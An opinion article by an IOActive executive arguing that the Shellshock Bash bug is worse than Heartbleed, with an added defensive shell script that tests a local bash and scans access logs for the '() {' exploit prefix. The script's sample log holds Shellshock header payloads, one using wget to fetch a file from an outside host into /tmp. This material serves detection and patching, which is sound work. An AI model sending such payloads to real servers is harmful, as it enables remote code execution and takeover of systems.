
Why the Shellshock Bug Is Worse than Heartbleed

We still don’t know how many systems are vulnerable to the Shellshock bug, but it is likely in the millions.
September 30, 2014

Last Wednesday a serious software vulnerability called Shellshock was reported; the bug could be exploited to compromise millions of servers and other devices worldwide. We still don’t know how wide and costly the problem will be, but we already know that Shellshock is more serious than the Heartbleed vulnerability that received wide attention back in April.

Heartbleed was a flaw in OpenSSL, the library many servers use to encrypt and secure communications. It let an attacker read chunks of a vulnerable server’s memory, which could contain sensitive information such as private encryption keys or passwords; those could then be used to secretly access the system later, for example to steal personal data.

Shellshock gives an attacker far more power. It lets them run arbitrary commands on a system, with the privileges of whatever program handed their input to Bash, and so take control of it without having a username and password. Exploitation is simple and doesn’t require advanced skills: a single crafted string is enough.

Because an attacker can use Shellshock to remotely execute any code on a system, it could be used to build a self-replicating “worm”: each compromised system would attack other systems, and so on, propagating over the network and compromising hundreds or thousands of systems in little time.

The Shellshock vulnerability was found in a software package called Bash, a command line interpreter, or shell, that provides a powerful, flexible way to run commands on a computer. It is the default shell on most Linux-based operating systems and on Apple’s Mac OS X. Bash is also found on many simple Internet-connected devices that run versions of Linux (although many such devices use a smaller shell, such as BusyBox, and are not affected), meaning that not only servers could be compromised but also some home routers, IP cameras, etc.

Some popular networking devices widely used by corporations have already been identified as vulnerable. Mobile devices are not at risk, unless you have modified your Apple or Android device to gain more control over its software.

Shellshock is dangerous because, while Bash itself is not directly exposed to the Internet, software that is exposed can hand attacker-supplied data to Bash internally. The bug lies in how Bash processes its environment variables: if a variable’s value looks like a function definition, Bash will also run any commands appended after it. Any program that copies untrusted input into an environment variable and then starts Bash is therefore an entry point. The most common case is a web server running CGI scripts, which places the headers of each HTTP request into environment variables. Another is the DHCP client software that obtains a network address when you connect to a network, including a Wi-Fi network: on many Linux systems it passes values received from the DHCP server to a Bash script, so someone with a vulnerable operating system (mostly Linux) could be attacked simply by connecting to an untrusted Wi-Fi network. (It’s worth noting that connecting to untrusted Wi-Fi networks is always a risk.)

Within a day of Shellshock being reported, there was evidence that it was being used to stage attacks “in the wild.” Information security departments at all companies and organizations should take preventive actions such as applying security fixes and close monitoring of internal networks. The United States Computer Emergency Readiness Team has issued an alert, and along with other security organizations worldwide is recommending users and system administrators apply security fixes as soon as possible.
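The two checks a practitioner would want for the mechanism and the response described above, as an added example that is not code from the article or from IOActive: a test of whether a given Bash binary still executes commands smuggled in after a function definition in its environment, and a scan of web-server access logs for the “() {” prefix that attackers send in HTTP headers to reach CGI scripts. It assumes a POSIX shell, standard grep, and a bash binary on PATH (or one passed as an argument); the log lines are constructed for the example, using RFC 5737 documentation addresses.

```shell
#!/bin/sh
# Added example, not from the article: two practical checks for Shellshock
# (CVE-2014-6271). Assumes a POSIX shell and standard grep; the first check
# needs a bash binary on PATH or passed as the first argument.

# 1. Is a given bash vulnerable?
# On start-up a vulnerable bash imports any environment variable whose value
# begins with "() {" as a function definition and, crucially, keeps parsing
# and executing whatever follows the closing brace. Exporting
#   x='() { :;}; echo VULNERABLE'
# and starting bash therefore makes a vulnerable build print VULNERABLE before
# it runs anything else; a fixed build treats x as an ordinary variable.
# Prints "vulnerable", "patched" or "no-bash"; exit status 0 only if vulnerable.
bash_shellshock_check() {
    bin="${1:-bash}"
    command -v "$bin" >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    # stderr is dropped: a fixed bash warns "ignoring function definition attempt"
    out=$(env x='() { :;}; echo VULNERABLE' "$bin" -c ':' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "vulnerable"; return 0 ;;
        *)            echo "patched";    return 1 ;;
    esac
}

# 2. Has anyone tried it against a web server?
# A CGI gateway copies request headers into the CGI program's environment
# (User-Agent becomes HTTP_USER_AGENT, Referer becomes HTTP_REFERER, ...), so
# the exploit string travels in a header and is written to the access log.
# Matching the "() {" prefix (any whitespace between ")" and "{") catches the
# attempts whether or not they succeeded.
SHELLSHOCK_RE='[(][)][[:space:]]*[{]'

# Prints the matching lines read from stdin.
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE" || [ $? -eq 1 ]   # grep status 1 = no match, not an error
}

# Prints only the number of matching lines read from stdin.
count_shellshock_hits() {
    grep -Ec "$SHELLSHOCK_RE" || [ $? -eq 1 ]
}

# Constructed sample log (Apache combined format, RFC 5737 documentation IPs).
# Lines 1 and 3 carry the exploit prefix in User-Agent and Referer respectively;
# line 2 is ordinary traffic.
SAMPLE_LOG='203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.9/x -O /tmp/x\""
198.51.100.22 - - [25/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; ping -c 1 198.51.100.9" "curl/7.37.0"'

main() {
    printf 'local bash: %s\n' "$(bash_shellshock_check || true)"
    printf '%s\n' "$SAMPLE_LOG" | shellshock_hits
    printf 'suspicious requests: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | count_shellshock_hits)"
}

main
```

Run it on a real log with `shellshock_hits < /var/log/apache2/access.log`; a hit does not by itself prove compromise, because the request may have targeted a path with no CGI script or a host already patched, but it identifies the sources and the exact commands that were attempted. The bash check should be repeated with each bash binary on the system (for example `bash_shellshock_check /usr/local/bin/bash`), since appliances and manually installed copies are exactly the ones package updates miss.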

However, it’s still too early to come up with an exhaustive list of affected devices that need updating. And although researchers and device vendors are publishing details about which devices are vulnerable and which aren’t, for some devices in use, no one will be checking because they are no longer supported, or documentation is lacking.

The faster systems are identified and patched, the lower the number of security compromises—and financial losses—that will be caused by Shellshock. It’s possible the economic effects of this bug will be severe because one compromised system can affect a lot of people. For instance, a compromised e-commerce site could not only cause lost sales due to downtime needed to patch, but also expose millions of credit card details, inconveniencing consumers.

Cesar Cerrudo is the chief technology officer at the computer security company IOActive Labs.
